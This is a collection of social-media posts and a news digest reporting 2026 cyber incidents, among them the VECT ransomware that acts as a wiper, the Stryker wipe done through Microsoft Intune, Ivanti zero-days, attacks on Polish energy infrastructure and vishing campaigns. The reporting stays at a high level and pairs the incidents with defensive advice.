VECT Ransomware is a Wiper, Not Ransomware — Don’t Bother Paying, Says Check Point Research

You can read their blog post at https://blog.checkpoint.com/security/vect-ransomware-why-paying-wont-get-your-files-back/ or their full report at https://research.checkpoint.com/2026/vect-ransomware-by-design-wiper-by-accident/

(h/t, @cybernews)

I contacted VECT and asked them for their response to #CheckPoint's report. Their response was, um... short? :)

https://databreaches.net/2026/04/29/vect-ransomware-is-a-wiper-not-ransomware-dont-bother-paying-says-checkpoint-research/

#infosecurity #ransomware #decryption #decryptor #VECT #wiper

@GossiTheDog @BleepingComputer @dangoodin @jgreig

📰 VECT 2.0 Ransomware Flaw Means Paying the Ransom is Pointless—Large Files are Wiped Forever

⚠️ VECT 2.0 ransomware is actually a destructive WIPER for files >128KB! A critical flaw makes data recovery impossible, even if you pay. Researchers warn that paying the ransom is pointless as the decryption keys are destroyed. #Ransomware #Wiper #CyberSecurity

🔗 https://cyber.netsecops.io

‘CanisterWorm’ Springs #Wiper Attack #Targeting #Iran

A financially motivated data theft and #extortion group is attempting to inject itself into the #Iranwar , unleashing a #worm that spreads through poorly secured cloud services and wipes data on infected systems that use Iran’s time zone or have #Farsi set as the default language.
#security #CanisterWorm

https://krebsonsecurity.com/2026/03/canisterworm-springs-wiper-attack-targeting-iran/

Parliamo del fonte cyber Iran-USA: Handala contro Stryker

https://insicurezzadigitale.com/parliamo-del-fonte-cyber-iran-usa-handala-contro-stryker/

The Stryker outage confirms a shift in Handala’s tactics: moving from regional hacktivism to destructive global operations. By abusing Microsoft Intune, they bypassed traditional EDR to wipe 200k devices. Identity, not malware, was the vector.

Read More: https://www.security.land/stryker-cyberattack-handala-wiper/

#SecurityLand #News #Stryker #Handala #Wiper #MicrosoftIntune #Cybersecurity

Iran-linked hackers claim wiper attack on Stryker—200K systems wiped across 79 countries. No ransom, just destruction. Medical tech firm targeted over Israeli acquisition. Infrastructure warfare, not cybercrime. 🏥💥

https://krebsonsecurity.com/2026/03/iran-backed-hackers-claim-wiper-attack-on-medtech-firm-stryker/

#cybersecurity #wiper #iran

Breaking, new, by me: Iran-backed Hackers Claim Wiper Attack on Medtech Firm Stryker

A hacktivist group with links to Iran's intelligence agencies is claiming responsibility for a data-wiping attack against Stryker, a global medical technology company based in Michigan. News reports out of Ireland, Stryker's largest hub outside of the United States, said the company sent home more than 5,000 workers there today. Meanwhile, a voicemail message at Stryker's main U.S. headquarters says the company is currently experiencing a building emergency.

From the story:

"Wiper attacks usually involve malicious software designed to overwrite any existing data on infected devices. But a trusted source with knowledge of the attack who spoke on condition of anonymity told KrebsOnSecurity the perpetrators in this case appear to have used a Microsoft service called Microsoft Intune to issue a ‘remote wipe’ command against all connected devices."

"Intune is a cloud-based solution built for IT teams to enforce security and data compliance policies, and it provides a single, web-based administrative console to monitor and control devices regardless of location. The Intune connection is supported by this Reddit discussion on the Stryker outage, where several users who claimed to be Stryker employees said they were told to uninstall Intune urgently."

https://krebsonsecurity.com/2026/03/iran-backed-hackers-claim-wiper-attack-on-medtech-firm-stryker/

#stryker #handala #intune #wiper #cybersecurity

It's been a busy 24 hours in the cyber world with significant updates on actively exploited zero-days, nation-state attacks on critical infrastructure, sophisticated vishing campaigns, and the evolving threat landscape of AI. Let's dive in:

Ivanti EPMM Zero-Days Under Active Exploitation ⚠️

- Ivanti has patched two critical zero-day vulnerabilities (CVE-2026-1281, CVE-2026-1340) in its Endpoint Manager Mobile (EPMM) product, both rated CVSS 9.8 for unauthenticated remote code execution (RCE).
- These flaws are actively being exploited in a limited number of customer environments, allowing threat actors to gain administrative access, move laterally, and potentially access sensitive data like phone numbers and GPS locations.
- While specific IOCs are scarce, defenders should scrutinise Apache access logs for unusual GET requests with bash commands in In-House Application Distribution and Android File Transfer Configuration features, and look for unexpected web shells or WAR/JAR files. If compromised, a full restore from backup or migration to a new EPMM instance is recommended.

🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/01/30/ivanti_epmm_zero_days/

Coordinated Cyber Attacks on Polish Critical Infrastructure 🚨

- CERT Polska has detailed coordinated destructive cyber attacks on over 30 wind and solar farms, a manufacturing company, and a combined heat and power (CHP) plant in Poland on December 29, 2025.
- The attacks, attributed to Russia's FSB-linked Static Tundra (aka Berserk Bear, Ghost Blizzard), involved reconnaissance, firmware damage, file deletion, and deployment of custom wiper malware like DynoWiper and LazyWiper.
- Initial access was gained via vulnerable Fortinet perimeter devices and statically defined accounts lacking two-factor authentication, with attackers also exfiltrating data related to OT network modernisation and SCADA systems from M365 services.

📰 The Hacker News | https://thehackernews.com/2026/01/poland-attributes-december-cyber.html

ShinyHunters-Style Vishing Bypasses MFA for SaaS Data Theft 🔒

- Mandiant has observed an expansion of financially motivated ShinyHunters-style (UNC6240) activity, tracked as UNC6661 and UNC6671, using advanced vishing and fake credential harvesting sites.
- These groups impersonate IT staff to trick employees into providing SSO credentials and MFA codes, then register their own devices for MFA to access cloud SaaS platforms, exfiltrate sensitive data, and extort victims.
- Organisations should enhance help desk verification processes, enforce strong passwords, remove SMS/phone/email as MFA options, restrict management access, and implement robust logging and detection for MFA lifecycle changes and SaaS export behaviours, moving towards phishing-resistant MFA like FIDO2.

📰 The Hacker News | https://thehackernews.com/2026/01/mandiant-finds-shinyhunters-using.html

Iran-Linked RedKitten Uses AI for Human Rights NGO Targeting 🐱

- A Farsi-speaking threat actor, RedKitten, linked to Iranian state interests, is targeting human rights NGOs and activists, likely leveraging large language models (LLMs) for tooling development.
- The campaign uses macro-laced Excel documents (fabricated protestor death details) in 7-Zip archives as lures, dropping a C#-based SloppyMIO implant via AppDomainManager injection.
- SloppyMIO uses GitHub as a dead drop resolver for Google Drive URLs, steganographically retrieving configuration for its Telegram Bot API-based command-and-control, enabling command execution, file exfiltration, and persistence.

📰 The Hacker News | https://thehackernews.com/2026/01/iran-linked-redkitten-cyber-campaign.html

Agentic AI: The Next Big Attack Surface 🤖

- A Dark Reading poll indicates that agentic AI is widely expected to become the top attack vector by the end of 2026, due to the expanded attack surface from agents' high access and autonomy, especially with insecure code and "shadow AI."
- Experts highlight that the primary vulnerability lies in what compromised AI agents can access, stressing that authentication and access control, rather than AI safety features, are the critical battleground for securing autonomous systems.
- Deepfakes are also rising as a major social engineering vector for high-value targets, while the adoption of phishing-resistant passkeys is lagging, leaving organisations vulnerable as agentic systems proliferate.

🕶️ Dark Reading | https://www.darkreading.com/threat-intelligence/2026-agentic-ai-attack-surface-poster-child

#CyberSecurity #ThreatIntelligence #Vulnerabilities #ZeroDay #RCE #Ivanti #NationState #APT #CriticalInfrastructure #Poland #Russia #Wiper #ShinyHunters #Vishing #MFA #SaaS #Extortion #Iran #RedKitten #LLM #AI #Deepfakes #ThreatLandscape #InfoSec #CyberAttack #Malware #IncidentResponse